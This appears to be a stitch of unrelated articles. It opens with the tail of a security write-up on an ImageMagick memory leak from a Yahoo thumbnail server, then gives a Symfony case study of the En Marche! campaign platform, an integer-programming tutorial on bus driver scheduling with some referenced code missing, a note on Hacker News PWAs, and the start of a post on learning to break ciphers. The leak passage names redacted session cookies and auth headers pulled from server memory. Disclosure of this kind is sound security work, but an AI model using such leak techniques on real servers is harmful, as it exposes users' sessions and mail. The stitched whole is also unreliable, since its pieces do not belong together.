So now that we have a reliable and likely byte-perfect exfiltration primitive, what are some interesting strings in the memory space of the Yahoo! thumbnail server? With appropriate redactions representing long high-entropy strings:

SSLCOOKIE: SSL=v=1&s=redacted&kv=0

Yahoo-App-Auth: v=1;a=yahoo.mobstor.client.mailtsusm2.prod;h=10.210.245.245;t=redacted;k=4;s=redacted

https://dl-mail.ymail.com/ws/download/mailboxes/@.id==redacted/messages/@.id==redacted/content/parts/@.id==2/raw?appid=getattachment&token=redacted&ymreqid=redacted

Yeah, it's looking pretty serious.

In terms of interesting strings other than session secrets, etc., what else did we see? Well, most usefully, there are some paths, error messages and version strings that would appear to offer a very precise determination that indeed, ImageMagick is here and indeed, it is dangerously old:

/usr/lib64/ImageMagick-6.8.9/modules-Q16/coders/sun.so
ImageMagick 6.8.9-6 Q16 x86_64 2014-07-25 http://www.imagemagick.org

unrecognized PerlMagick method

Obviously, these strings made for a much more convincing bug report. Also note the PerlMagick reference. I'm not familiar with PerlMagick but perhaps PerlMagick leads to an in-process ImageMagick, which is why our out-of-bounds image data reads can read so much interesting stuff.

Conclusion

This was fun. We found a leak that encoded only a small amount of data per JPEG compressed pixel returned to us, allowing us to reliably reconstruct original bytes of exfiltrated server memory.

The combination of running an ImageMagick that is both old and also unrestricted in the enabled decoders is dangerous. The fix of retiring ImageMagick should take care of both those issues :)

An open-source web platform for the new President of France

This Case Study is a guest post written by Titouan Galopin, lead engineer and product lead at EnMarche project. Please note that this is a strictly technical article; any political comment will be automatically deleted.

Want your company featured on the official Symfony blog? Send a proposal or case study to fabien.potencier@sensiolabs.com


Project Background

In April 2016, Emmanuel Macron, now President of France, created a political movement called "En Marche!" ("On the Move" in English), initially as a door-to-door operation to ask the public what was wrong with France.

Unlike established political parties, En Marche! didn't have any infrastructure, budget or members to support its cause. That's why En Marche! relied on the power of the Internet since its very beginning to find supporters, promote events and collect donations.

I started to work for En Marche! as a volunteer in October 2016. The team was small and all of the IT operations were maintained by just one person. So they gladly accepted my proposal to help them. At that time, the platform was created with WordPress, but we needed to replace it with something that allowed faster and more customized development. The choice of Symfony was natural: it fits the project size well, I have experience with it and it scales easily to handle the large number of users we have.

Architecture overview

Scalability was the top priority of the project, especially after the issues they faced with the first version of the platform that wasn't built with Symfony. The following diagram shows an overview of the project architecture, which is extremely scalable and redundant where needed:

We use Google Container Engine and Kubernetes to provide scalability, rolling updates and load balancing.

The Symfony app is built from the ground up as a Dockerized application. The configuration uses environment variables and the application is read-only to keep it scalable: we don't generate any files at run-time in the container. The application cache is generated when building the Docker image and then is synchronized amongst the servers using the Symfony Cache component combined with a Redis instance.

There are two workers, fed by RabbitMQ, to process some heavy operations in the background: sending emails (sometimes we have to send 45k emails in a single request) and building the serialized JSON users lists that are used by several parts of the application to avoid dealing with slow and complex SQL queries.

The database uses Google Cloud SQL, a centralized MySQL database we don’t have to manage. To connect to it, we use the Cloud SQL proxy Docker image.

Deployment

The project uses a Continuous Delivery strategy, which is different from the Continuous Deployment approach: each commit is automatically deployed on a staging server but the production deployment is manual. Google Container Engine and Kubernetes are the key components to our deployment flow.

The Continuous Delivery process, as well as the unit and functional tests, is handled by CircleCI. We also use StyleCI (to ensure that new code matches the coding style of the rest of the project) and SensioLabsInsight (to perform automatic code quality analyses). These three services are configured as checks that each Pull Request must pass before merging it.

When a Pull Request is merged, the Continuous Delivery process starts (see the configuration file):

  1. Authenticate on Google Cloud using a Circle CI environment variable.
  2. Build the Javascript files for production.
  3. Build the three Docker images of the project (app, mails worker, users lists worker).
  4. Push the built images to Google Container Registry.
  5. Use the kubectl command line tool to update the staging server (a rolling update).

The only process performed manually (on purpose) is the SQL migration. Even if that can be automated, we prefer to carefully review those migrations before applying them to prevent serious errors on production.

Front-end

The application front-end doesn't follow the single-page application pattern. In fact, we wanted to use the least amount of Javascript possible to improve performance and rely on the native browser features.

React + Webpack

The JavaScript code of the application is implemented using React compiled with Webpack. We don't use Redux - or even React-Router - but pure React code, and we load the components only in specific containers on the page, instead of building the whole page with them. This is useful for two reasons:

  • The HTML content is fully rendered before React is loaded, and then React modifies the page contents as needed. This makes the application usable without JavaScript, even when the page is still loading on slow networks. This technique is called "progressive enhancement" and it dramatically improves the perceived performance.
  • We use Webpack 2 with tree shaking and chunks loading, so the components of each page are only loaded when necessary and therefore do not bloat the minified application code.

This technique led us to organize the front-end code as follows:

  • A front/ directory at the root of the application stores all the SASS and JavaScript files.
  • A tiny kernel.js file loads the JavaScript vendors and application code in parallel.
  • An app.js file loads the different application components.
  • In the Twig templates, we load the components needed for each page (for example, the address autocomplete component).

Front-end performance

Front-end performance is often overlooked, but the network is usually the biggest bottleneck of your application. Saving a few milliseconds in the backend won't take you too far, but saving 3 or more seconds of loading time for the images will change the perception of your web site.

Images were the main front-end performance issue. Campaign managers wanted to publish lots of images, but the users want fast-loading pages. The solution was to use powerful compression algorithms and apply other tricks.

First, we stored the image contents on Google Cloud Storage and their metadata in the database (using a Doctrine entity called Media). This allows us, for example, to know the image dimensions without needing to load it. This helps us create a web page design that doesn't jump around while images load.

Second, we combined the Media entity data with the Glide library to implement:

  • Contextual image resizing: for example, the images displayed on the small grid blocks in the homepage can be much smaller and of lower resolutions than the same images displayed as the main article image.
  • Better image compression: all images are encoded as progressive jpegs with a quality of 70%. This change improved the loading time dramatically compared to other formats such as PNG.

The integration of Glide into Symfony was made with a simple endpoint in the AssetController, and we used signatures and the cache to mitigate DDoS attacks on this endpoint.

Third, we lazy loaded all images below the scroll, which consists of three steps:

  1. Load all the elements above the scroll as fast as possible, and wait for the ones below it.
  2. Load ultra low resolution versions of the images below the scroll (generated with Glide) and use local JavaScript code to apply a gaussian blur filter to them.
  3. Replace these blurred placeholders when the high quality images are loaded.

We implemented an application-wide JavaScript listener to apply this behavior everywhere on the web site.

Forms

The project includes some interesting forms. The first one is the form to sign up on the web: depending upon the country and postal code fields, the city field changes from a text input to a prepopulated select list.

Technically there are two fields: “cityName” and “city” (the second one is the code assigned to the city according to the French regulations). The Form component populates these two fields from the request, as usual.

On the view side, only the cityName field is displayed initially. If the selected country is France, we use some JavaScript code to show the select list of cities. This JavaScript code also listens to the change event of the postal code field and makes an AJAX request to get the list of related cities. On the server side, if the selected country is France, we require a city code to be provided and otherwise we use the cityName field.

This is a good example of the progressive enhancement technique discussed a bit earlier in this article. The JavaScript code, like everything else, is just a helper to make some things nicer, but it's not critical to make the feature work.

As these address fields are used a lot in the application, we abstracted them into an AddressType form type associated with an address JavaScript component.

The other interesting form is the one that lets you send an email to someone trying to convince them to vote for the candidate. It's a multi-step form that asks some questions about that other person (gender, age, job type, topics of interest, etc.) and then generates customized content that can be sent by email.

Technically the form combines a highly dynamic Symfony Form with the Workflow component, which is a good example of how to integrate both. The implementation is based on a model class called InvitationProcessor populated from a multi-step and dynamic form type and storing the contents in the session. The Workflow component was used to ensure that the model object is valid, defining which transitions were allowed for each model state: see InvitationProcessorHandler and workflows.yml config.

Search Engine

The search engine, which is blazing fast and provides real-time search results, is powered by Algolia. The integration to index the application entities (articles, pages, committees, events, etc.) is made with the AlgoliaSearchBundle.

This bundle is really useful. We just added a few annotations to the Doctrine entities and after that, the search index was automatically updated whenever an entity is created, updated or deleted. Technically, the bundle listens to the Doctrine events, so you don't need to do anything to keep the search contents always updated.

Security

As any other high-profile web site, we were the target of some attacks coordinated and carried out by powerful organizations. Most of the attacks were of brute-force nature and the aim was to take the web site down rather than infiltrate it.

The web site was targeted by DDoS attacks eight times in the whole campaign, five of them in the final two weeks. They had no impact on the Symfony app because of the Cloudflare mitigation and our on-demand scalability based on Kubernetes.

First, we suffered three attacks based on WordPress pingbacks. The attackers used thousands of hacked WordPress websites to send pingback requests to our website, quickly overloading it. We added some checks in the nginx configuration to mitigate this attack.

The other attacks were more sophisticated and required both Cloudflare and Varnish to mitigate them. Using Cloudflare to cache assets was so efficient that we thought there was no need for a reverse proxy. However, a reverse proxy was proven necessary during DDoS attacks: in the last days of the campaign, the attacks were huge (up to 300,000 requests per second) and we had to disable the user system and enable the "Cache Everything" flag on Cloudflare.

There's nothing you can do to prevent security attacks, but you can mitigate them by complying with the best practices of Symfony, which, by the way, is one of the few open source projects that has conducted a public security audit.

Open Source

The en-marche.fr web platform and its related projects have been open sourced in the @EnMarche GitHub account. We didn't promote this idea much though, because open source is pretty complex to explain to non-technical people. However, we received some contributions from people that found the project and were glad that it was open source.

We are also thinking about giving back to Symfony by contributing some elements developed for the project. For example, the UnitedNationsCountryType form type could be useful for some projects. We also developed an integration with the Mailjet service that could be released as a Symfony bundle.


Breaking Through the Normalization Barrier: A Self-Interpreter for F-omega [pdf]

An Intro to Integer Programming for Engineers: Simplified Bus Scheduling

Image: Steve Skiena

This article is part of Remix’s series on the software engineering problems we face. In this installment, Remix Engineer Dan Hipschman walks through bus driver scheduling and a simplified approach to solving it using integer programming.

I studied NP-Hardness in school but never tackled any problems in real life. Until now.

At Remix, I finally encountered NP-Hardness, adding a powerful new tool called integer programming to my tool belt. This is an intro to integer programming for engineers who haven’t used it. The goal is for you to start thinking about some ways you can use integer programming and wanting to learn more.

The Bus Driver Scheduling Problem

Let’s start with a motivating example. At Remix we improve public transportation, especially bus systems. Have you ever wondered how bus drivers coordinate their lunch breaks? Or if you aren’t on the bus that often, maybe you’ve wondered how flight attendants and pilots fly around the world and end up back home, which is a similar problem. We’re going to solve the problem of scheduling bus driver shifts in this post. I’m going to include working code, so for the full experience, please break out your shell and editor to follow along.

Let’s frame the problem. Say we have four bus routes, called A, B, C, and D. Let’s assume that each route takes an hour to complete. They’re loops, so they start and end in the same place. Each route has one bus running on it from 9 AM until 9 PM. Finally, the routes all converge at the same point every hour on the hour, so it would be easy for drivers to switch shifts and take their lunch breaks at that location. I drew some demo routes that all converge in the top right of the map to make this clear.

Since our bus service runs from 9 AM until 9 PM, and each route takes an hour to complete, we’ll have 12 full trips for each route (48 total trips). Let’s represent each trip as a tuple: (route_name, hour_of_day). Let’s write a function to generate these. Don’t worry if you don’t know Python, we’ll keep it simple.
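Here's a minimal sketch of such a function (my own reconstruction, written to match the output shown just below):

    def generate_trips(route_names, first_hour, last_hour):
        """One (route_name, hour_of_day) tuple per trip, last_hour inclusive."""
        return [(route, hour)
                for route in route_names
                for hour in range(first_hour, last_hour + 1)]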

Here’s our resulting 48 trips:

>>> generate_trips('ABCD', 9, 12 + 9)
[('A', 9), ('A', 10), ('A', 11), ('A', 12), ('A', 13), ('A', 14), ('A', 15), ('A', 16), ('A', 17), ('A', 18), ('A', 19), ('A', 20), ('A', 21), ('B', 9), ('B', 10), ('B', 11), ('B', 12), ('B', 13), ('B', 14), ('B', 15), ('B', 16), ('B', 17), ('B', 18), ('B', 19), ('B', 20), ('B', 21), ('C', 9), ('C', 10), ('C', 11), ('C', 12), ('C', 13), ('C', 14), ('C', 15), ('C', 16), ('C', 17), ('C', 18), ('C', 19), ('C', 20), ('C', 21), ('D', 9), ('D', 10), ('D', 11), ('D', 12), ('D', 13), ('D', 14), ('D', 15), ('D', 16), ('D', 17), ('D', 18), ('D', 19), ('D', 20), ('D', 21)]

The driver scheduling problem is that we have some work that needs to be done, and we need to assign it to drivers. In other words, we want to come up with a set of duties for the bus drivers, where a duty is simply a list of trips they need to drive. Every trip must be part of exactly one driver’s duty. Let’s further assume we have some rules from payroll (sketched as a cost function just after this list):

  • Each duty over four hours should allow the driver to have a break
  • Drivers get paid for each hour they work, but not for breaks
  • They get a minimum pay of eight hours for coming into work (known as guaranteed pay)
  • They get 1.5x pay for each hour they work over eight hours (overtime pay)
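To make those rules concrete, here is a small cost function of my own (not from the article); the hourly rate of 1.0 is a placeholder:

    def duty_cost(paid_hours, hourly_rate=1.0):
        # paid_hours counts driving time only, since breaks are unpaid.
        guaranteed = 8
        if paid_hours <= guaranteed:
            return guaranteed * hourly_rate                 # guaranteed minimum pay
        overtime = paid_hours - guaranteed
        return (guaranteed + 1.5 * overtime) * hourly_rate  # 1.5x pay past eight hours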

We’d like not only to determine a set of duties, but the payroll department would like us to minimize driving costs. How do we do this? Well, as you might have guessed, we use integer programming… somehow. But first let me explain what integer programming is.

What Is Integer Programming Anyway?

As a precursor to integer programming, I’m going to define linear programming. Linear programs are mathematical models and there are algorithms to solve them. Let’s start with a linear expression. This is called the objective function:

    a1 * x1 + a2 * x2 + ... + an * xn

The goal of linear programming is to minimize some objective function. By “some” objective function, I mean that n and the a’s are all known for a particular problem. E.g., 3 * x1 + 14 * x2.

Now, of course, if that was all there was to it, we could just set all the x to zero. However, linear programs are also allowed to have one or more constraints. Constraints are each simply another linear expression, set less than or equal to zero. Note that the coefficients of the x’s can be different from those in the objective, and there can be a constant term as well. E.g.,

b1 * x1 + b2 * x2 + … + bn * xn + c <= 0

And so on. There can be as many constraints as you like. Note that some coefficients in the constraints could be zero, effectively meaning that not every variable needs to be in every constraint.

Equality is allowed, using a sort of “trick” which you can verify. The following:

b1 * x1 + b2 * x2 + … + bn * xn + c = 0

is equivalent to:

b1 * x1 + b2 * x2 + … + bn * xn + c <= 0
-(b1 * x1 + b2 * x2 + … + bn * xn + c) <= 0

OK, so given the objective and the constraints, the goal of linear programming is to minimize the objective.

Let’s Jump Into a Shell

Let’s make this concrete and jump into a shell. We can install and use a Python integer programming solver library to demonstrate all this (it also solves linear programs). The Python package is called Pulp. Here’s a demo:

$ pip install pulp
$ python
>>> from pulp import *
>>> x1 = LpVariable('x1')
>>> p = LpProblem('p', LpMinimize)
>>> p += x1
>>> p.solve()
1
>>> LpStatus
{0: 'Not Solved', 1: 'Optimal', -2: 'Unbounded', -1: 'Infeasible', -3: 'Undefined'}
>>> x1.value()
0.0

Let’s walk through this line by line.

$ pip install pulp

This simply installs pulp. If you’re not in a virtualenv, you might need to use sudo.

>>> from pulp import *

This imports Pulp. I’m going to be lazy and import everything into the global namespace using *. Everything in Pulp starts with “Lp” or “lp” so it should be clear what came from the module.

>>> x1 = LpVariable('x1')

This creates a variable. The argument is the name, which is arbitrary (just make it unique if you create more than one variable).

>>> p = LpProblem('p', LpMinimize)

This creates a problem, which is Pulp’s way of keeping pieces of the linear program together. The first argument is another arbitrary name. The second is LpMinimize, which makes explicit that we want to minimize the objective. (Minimizing and maximizing are mathematically equivalent: multiply the objective by -1 to turn one into the other, so linear programming can do both.)

We’ll “add” the objective function with the following syntax (Pulp uses a lot of operator overloading):

>>> p += x1

Hence our objective function is simply:

minimize x1

Not very exciting, but let’s see what happens.

>>> p.solve()
1
>>> LpStatus
{0: 'Not Solved', 1: 'Optimal', -2: 'Unbounded', -1: 'Infeasible', -3: 'Undefined'}

The solve function returns a status. The different statuses are described in LpStatus. In this case, Pulp is telling us it found an optimal solution to the problem. After calling solve, the variables will have their value set to whatever minimizes the objective. So let’s inspect:

>>> x1.value()
0.0

Pulp tells us that assigning 0 to x1 minimizes the objective (remember that all the variables are nonnegative). In this case the problem was trivial.

So let’s add a constraint:

>>> p += x1 >= 1
>>> p.solve()
1
>>> x1.value()
1.0

This adds a constraint that x1 >= 1, and then re-solves. Obviously the minimal value of x1 is now 1, since 0 is not allowed by the constraint. Now our complete linear program is:

minimize x1
subject to x1 >= 1

Progress! We’ve learned how to write and solve linear programs using Pulp.

Solving the Driver Scheduling Problem

Let’s move on to integer programming, and how it gets us closer to solving our driver scheduling problem.

An integer program is exactly the same as a linear program, with the additional constraint that all the x’s are integers. I.e.,

x1, x2, …, xn are all integers

Without getting into theory, I’ll just mention that solving integer programs is an NP-hard problem. However, there are algorithms that can often solve them much faster than brute force.

Pulp can also solve integer programs, which I’ll show you in a bit. But first, let’s discuss the high level approach to how integer programs will solve our original driver scheduling problem. We’ll solve our problem by modeling it as a weighted set partitioning problem. This image gives an intuitive idea of the problem:

On the left we have 12 items (the dots) and 7 sets containing different combinations of items. The solution to the set partitioning problem is the fewest number of sets which include all the items with no overlap. — Image by Steven Skiena.

The idea is that we have a set of items, represented by the points in the lefthand image above. We also have a set of sets, each represented by a squiggly loop in the left image. In this case, for example, there are seven sets (trust me, since counting them is probably bad for your eyes). The set partitioning problem is to find the smallest number of sets that contain all the items (points), without any overlap between sets (hence a “partition”). Every point must be in exactly one set. The solution to the problem above is shown on the righthand side.

The weighted set partitioning problem is when we assign a cost to each set. Then, instead of minimizing the number of sets, we minimize the sum of the values of the sets we choose. You can see that if we set all the weights to one, we get the original set partitioning problem.

Set partitioning is NP-complete (both weighted and unweighted). However, we can use integer programming to solve it optimally. NP-complete doesn’t mean that problems are always slow to solve. It only means that we can construct degenerate cases that cause any general algorithm to run slowly some of the time. At least, to the best of our knowledge (unless someone proves P=NP). Integer programs can often be solved relatively quickly.

In our problem, the dots in the set partitioning diagram are trips a bus takes from its origin to its destination (our tuples), and the sets are potential driver duties. In other words, each duty is a set of trips that a driver could potentially do. We’ll assign a weight to those sets using the driver pay rules we defined above (overtime, guarantee pay, etc.). When we solve the weighted set partitioning problem, we’ll get the set of duties that cover all the trips and minimize the sum of individual drivers’ costs. This is exactly what we want.

So here’s how we’ll do it. Each potential duty will be a variable (an x) in our integer program. We’ll further constrain all the x to be between zero and one. Since they’re integers, this actually restricts them to be exactly zero or one. The idea behind this is that a particular x will be one in the solution if the solver decides that using the duty is part of the optimal solution, and zero if the duty is discarded as not being part of the optimal solution.
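In Pulp, that zero-or-one restriction can be written directly on the variable. A small illustrative snippet (not from the original post):

from pulp import LpVariable

# A 0/1 decision variable: 1 if this duty is used in the schedule, 0 if it is discarded.
x1 = LpVariable('x1', lowBound=0, upBound=1, cat='Integer')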

The coefficient of each x is the cost of that duty in terms of driver pay.

Hence our integer program looks like this (let’s use p for pay instead of the a’s we were using above):

minimize p1 * x1 + p2 * x2 + … + pn * xn
subject to 0 <= xi <= 1 and xi integer, for each i

This means we have n potential duties. Each p is the driver pay (hence payroll cost) of the duty. We want Pulp to choose some x’s to be zero and some to be one. By doing this, our objective function will turn into the sum of the payments we have to make. And we want to minimize this.

Of course, as is, there are no constraints that some x need to be selected (set to one) at all. Hence, Pulp will helpfully set all x to zero to minimize the objective. What constraints do we need to add?

Well, every trip needs to be in exactly one duty. So we can add a constraint for every trip, so that the x’s corresponding to the duties that trip appears in sum up to 1. For example, we might have a constraint like this:

x1 + x2 + x3 + x4 + x5 = 1

This assumes for simplicity’s sake that the first five x’s correspond to the duties containing trip ('A', 9). Likewise, we’d have a constraint like this for every other trip.

These constraints say that for a given trip, exactly one duty must include it. No more, no less.

Time to Write Some Code!

OK, so we’re ready to write some code to solve our problem! Well, we’re close! But there’s one more hitch. Where are we going to get all the possible duties from? Generating every possible duty explodes exponentially with the number of trips. Hence, for now, we’ll randomly generate duties, and see what happens.

We already have code written above to generate the set of trips. Let’s write a function to randomly generate some duties from those trips. We’ll make sure that we don’t generate a duty with multiple trips that occur at the same time.

So let’s write it like this:

  • We’ll randomly choose the number of trips in the duty
  • Then we’ll randomly choose the hours for those trips
  • Then we’ll randomly choose the routes for each trip

Here’s the fully functioning code to generate trips and duties (extending the code above):
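A minimal sketch that follows the three steps above (the helper names generate_duty and generate_duties are assumptions, as is the use of random.sample to keep the trip hours distinct):

import random

def generate_duty(route_names, start_hour, end_hour):
    # A duty is a list of trips, with no two trips in the same hour.
    n_hours = end_hour - start_hour + 1
    n_trips = random.randint(1, n_hours)                                   # step 1: number of trips
    hours = random.sample(range(start_hour, end_hour + 1), n_trips)        # step 2: distinct hours
    return sorted(((random.choice(route_names), hour) for hour in hours),  # step 3: a route per trip
                  key=lambda trip: trip[1])

def generate_duties(n_duties, route_names, start_hour, end_hour):
    return [generate_duty(route_names, start_hour, end_hour) for _ in range(n_duties)]

Pretty-printing five generated duties (e.g. with pprint) gives output of the shape shown next.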

When I run this, here’s what I get:

$ ./duty_generation.py
[[('A', 14), ('A', 18)],
[('A', 9), ('B', 11), ('B', 12), ('D', 14), ('A', 15), ('A', 16), ('D', 18)],
[('C', 17), ('B', 18)],
[('C', 18)],
[('B', 9), ('C', 11), ('A', 16), ('B', 18), ('D', 19), ('C', 20)]]

Great! Now let’s write a function that tells us how much each duty costs:
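A sketch of such a cost function, reconstructed from the payroll rules above; the name duty_cost and the exact break check are assumptions, and the 1,000,000 value is simply a huge penalty that effectively forbids duties that violate the break rule:

BREAK_PENALTY = 1000000.0

def duty_cost(duty):
    hours = sorted(hour for _route, hour in duty)
    worked = len(hours)                             # each trip is one hour of paid work
    has_break = any(later - earlier > 1 for earlier, later in zip(hours, hours[1:]))
    if worked > 4 and not has_break:
        return BREAK_PENALTY                        # over four hours with no break
    if worked <= 8:
        return 8                                    # guaranteed minimum pay
    return 8 + 1.5 * (worked - 8)                   # time-and-a-half past eight hours

The output below shows (cost, duty) pairs, as you’d get from printing something like [(duty_cost(d), d) for d in duties].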

And here’s what the output looks like when I run it (I actually ran it a few times to get an interesting mix of costs):

[(1000000.0,
[('C', 9),
('A', 10),
('C', 11),
('C', 12),
('B', 13),
('A', 14),
('B', 15),
('C', 16),
('A', 17),
('C', 18),
('B', 19),
('B', 20)]),
(8, [('B', 12), ('A', 13), ('C', 17)]),
(8, [('B', 11), ('D', 13), ('D', 14), ('A', 16), ('A', 17), ('C', 19)]),
(8, [('C', 16)]),
(11.0,
[('C', 10),
('A', 11),
('C', 12),
('D', 13),
('C', 14),
('D', 15),
('A', 16),
('A', 18),
('B', 19),
('C', 20)])]

The Fun Part

OK! Now for the really fun part, solving the problem! Here’s the code. Recall the Pulp code we wrote above, as we’re building on top of it.

Here’s the complete runnable code.

Let’s run it and see what happens. The output will be fairly long because I’m asking Pulp to print a representation of the problem. I’ll truncate some repetitive parts to make it shorter:

driver_scheduling:
MINIMIZE
12.5*x1 + 8*x10 + 8*x11 + 8*x12 + 8*x13 + 8*x14 + 8*x15 + 8*x16 + 8*x17 + 8*x18 + 8*x19 + 9.5*x2 + 8*x20 + 8*x21 + 8*x22 + 8*x23 + 8*x24 + 8*x25 + 8*x26 + 8*x27 + 8*x28 + 8*x29 + 8*x3 + 8*x30 + 8*x31 + 8*x32 + 8*x33 + 8*x34 + 8*x35 + 8*x36 + 8*x37 + 8*x38 + 8*x39 + 1000000.0*x4 + 8*x40 + 8*x41 + 8*x42 + 8*x43 + 8*x44 + 8*x45 + 8*x46 + 8*x47 + 8*x48 + 8*x49 + 11.0*x5 + 8*x50 + 8*x51 + 8*x52 + 8*x53 + 8*x6 + 8*x7 + 8*x8 + 8*x9 + 0.0
SUBJECT TO
_C1: x7 = 1
_C2: x33 = 1
_C3: x1 + x45 = 1
_C4: x14 + x2 + x5 = 1
_C5: x1 + x20 + x4 = 1
...
_C47: x25 + x4 = 1
_C48: x24 = 1
VARIABLES
0 <= x1 <= 1 Integer
...
0 <= x9 <= 1 Integer
Optimal
Cost: 239.5
[[('B', 9),
('B', 10),
('B', 11),
('D', 12),
('D', 13),
('D', 14),
('D', 16),
('B', 17),
('D', 18),
('D', 19),
('B', 20)],
[('D', 10),
('C', 11),
('B', 13),
('B', 14),
('D', 15),
('C', 16),
('A', 17),
('B', 18),
('A', 19),
('D', 20)],
[('A', 9)],
[('A', 10)],
[('A', 11)],
[('A', 12)],
[('A', 13)],
[('A', 14)],
[('A', 15)],
[('A', 16)],
[('A', 18)],
[('A', 20)],
[('B', 12)],
[('B', 15)],
[('B', 16)],
[('B', 19)],
[('C', 9)],
[('C', 10)],
[('C', 12)],
[('C', 13)],
[('C', 14)],
[('C', 15)],
[('C', 17)],
[('C', 18)],
[('C', 19)],
[('C', 20)],
[('D', 9)],
[('D', 11)],
[('D', 17)]]

So for all our hard work, we have a solution! Hooray! But it’s a pretty crummy one. Most drivers do one trip, get paid the minimum of 8 hours, and go home. Well, it’s good for them, but payroll won’t be happy. This is because we’re only generating 5 duties, of course. Let’s increase that to 100 duties. And let’s also time how long it takes. Here’s the result (without Pulp output this time):

Optimal
Cost: 120
[[('A', 9), ('C', 11), ('D', 13), ('A', 14), ('D', 15)],
[('A', 10), ('D', 11), ('C', 13), ('A', 16), ('B', 18), ('D', 19)],
[('C', 17)],
[('D', 14), ('C', 15), ('D', 16), ('D', 17), ('A', 19)],
[('C', 9), ('B', 10), ('D', 18), ('C', 19), ('A', 20)],
[('B', 11), ('C', 14), ('C', 16), ('A', 18), ('B', 19), ('B', 20)],
[('D', 10), ('A', 12), ('A', 13), ('B', 16), ('A', 17), ('C', 18), ('C', 20)],
[('D', 9), ('C', 10), ('D', 12), ('B', 13), ('B', 17), ('D', 20)],
[('A', 11)],
[('A', 15)],
[('B', 9)],
[('B', 12)],
[('B', 14)],
[('B', 15)],
[('C', 12)]]
real 0m1.297s
user 0m0.110s
sys 0m0.000s

That’s much better! The cost is almost half! But it’s still not great. Let’s generate 1000 duties.

Optimal
Cost: 70.0
[[('C', 9), ('C', 11), ('C', 12), ('A', 15), ('C', 18), ('A', 19)],
[('A', 10), ('A', 11), ('D', 12), ('A', 13), ('A', 16), ('D', 18), ('C', 20)],
[('A', 9),
('C', 10),
('A', 12),
('C', 13),
('B', 14),
('D', 15),
('D', 16),
('C', 17),
('B', 19)],
[('D', 10),
('B', 12),
('B', 13),
('A', 14),
('B', 16),
('A', 17),
('B', 18),
('C', 19),
('B', 20)],
[('B', 9),
('B', 10),
('B', 11),
('D', 13),
('D', 14),
('B', 15),
('C', 16),
('B', 17),
('A', 18),
('D', 19)],
[('D', 9), ('D', 11), ('C', 14), ('D', 17), ('A', 20)],
[('D', 20)],
[('C', 15)]]
real 4m41.586s
user 3m11.270s
sys 0m0.990s

Phew, that’s much better. But also much slower! Well, we are solving an NP-complete problem after all. In practice, we could speed this up by generating duties more cleverly. E.g., there’s no reason for drivers to jump back and forth between routes all the time. If we limited that, we could generate more “good” duties, while ignoring “bad” duties without passing them to the solver.

There are also much more advanced techniques to speed up and improve results, but the intent of this article is to whet your appetite.

Integer Programming as a Flexible Framework

So that’s it! We’ve used integer programming to solve our problem. And we’ve saved the effort of thinking up an algorithm for this specific problem, which would probably be either slow, or suboptimal, or both. Integer programming also gives us a very flexible framework for making changes. E.g., we can customize the cost function to penalize some duties (like those that switch routes too often, because that’s confusing for drivers). When the problem gets more complicated, such as routes ending in different locations, or trips starting and ending at different times, integer programming can handle that really easily. If you don’t want something to happen, you can either just add a severe penalty (like we did with the driver break rule) or add a constraint.

There are many other interesting classes of problems that can be solved using integer programming as well. Since solving an integer program is NP-hard, it can in fact be used to solve many problems in NP, including NP-complete ones (as long as you can model them as an integer program without exponential growth). This is a very powerful tool, because it’s often much easier and more effective to model an NP or NP-complete problem as an integer program than it is to write an algorithm to solve it. You can also use integer programming to solve problems that already have polynomial time algorithms; this is still often useful as a first cut solution, and it often turns out to be fast enough.

To name just a few other examples of problems that integer programming is well suited to solve:

  • Transportation problems (such as package delivery, or resource delivery such as energy distribution)
  • Warehouse and container packing problems
  • Matching problems (such as what stock brokerages do to match buyers with sellers, or scheduling which sports teams play each other)
  • Map coloring

By the way, Pulp is a Python wrapper around back end solvers written in C. By default it uses CBC, which is an open source solver. There are commercial solvers as well. These are often used for harder problems in industry because they can be much faster. One well-known commercial solver is called Gurobi, and they have many example usages of integer programming. I encourage you to look through some Pulp case studies as well.

I hope you’ve found this interesting! Please comment or share this if you did. We’re planning to write another post going into more depth, so follow us if you’re interested.

Want to work on these types of problems? Remix is hiring!

Hacker News Readers as Progressive Web Apps


TodoMVC has helped thousands of developers select an MV* framework for their JavaScript applications. However, the web ecosystem has evolved in the past few years allowing us to build powerful applications using modern browser capabilities.

To provide developers with examples, we collected a list of Hacker News clients built with a number of popular JavaScript frameworks and libraries. Each implementation is a complete Progressive Web App that utilizes different progressive technologies to provide a fast, reliable and engaging experience.

Learning to break ciphers


Every now and then, I read a question about learning how to break ciphers, or more generally how to become a cryptographer/cryptologist.  From my viewpoint, the most important part of learning this skill is not advanced mathematics, but instead first learning how to think like a cryptographer.  When you go to break a cipher, there are no instructions on how to do it.  You simply need to get your hands dirty with the function under consideration and look for things that do not seem desirable for a secure function of that type.  While having a bag of tricks is going to help, ultimately it’s your creativity, persistence, and skills that are more likely going to make the difference.

I believe that there are a number of hackers out there that already know how to think the right way, and it is simply a matter of exercising that thought process on some reasonable, non-contrived examples to begin to understand what it takes to be a cryptologist.  You should not need to know advanced mathematics or advanced cryptographic techniques (such as linear or differential cryptanalysis) to get started.  So welcome to my blog post, which provides a number of exercises for you to practice on.  These examples mostly come from cryptanalysis that I have done, largely because I know the results, I was able to dig them up, and attacking them did not use advanced techniques.  I am building a list of other examples at the bottom of this blog, and invite other readers to add to it.

Before we begin, I want to point out some other resources on this topic:

  • Schneier’s Self-Study Course in Block Cipher Cryptanalysis is a great resource, but in my mind it is not the ideal place to start — from my viewpoint, it is the next step after you prove you can break ciphers such as what I have below.  By the way, you absolutely should read Schneier’s article So, You Want to be a Cryptographer.
  • The Matasano Crypto Challenges.  While they are similar in spirit to what I am writing here, my focus is at a lower level — breaking specific cryptographic primitives rather than constructs built from these primitives.  Regardless, the Matasano challenges are another great place to start.
  • The Simon Singh Cipher Challenges from his book, The Code Book.  This book is really fun to read, and will get you into the spirit of breaking his challenges.  But the first challenges are too easy and the last ones are very hard: it is really the middle ones that are most interesting.

I’m adding to existing resources because I think I have a nice, small collection of my own that I have accumulated over the years.  Like the Matasano challenges, my focus is on providing modern examples that are easy to break without complex mathematics or advanced cryptographic techniques.  These examples illustrate how to think like a cryptographer without requiring all the complex background in the most advanced cryptanalytic techniques.  If you can solve these problems (and your solutions may not necessarily be the same as mine), then you have the right type of thinking to become a cryptographer.  This blog post is written for computer scientists without deep mathematics skills who want to learn how to do cryptanalysis, and for teachers of cryptography for computer science students.

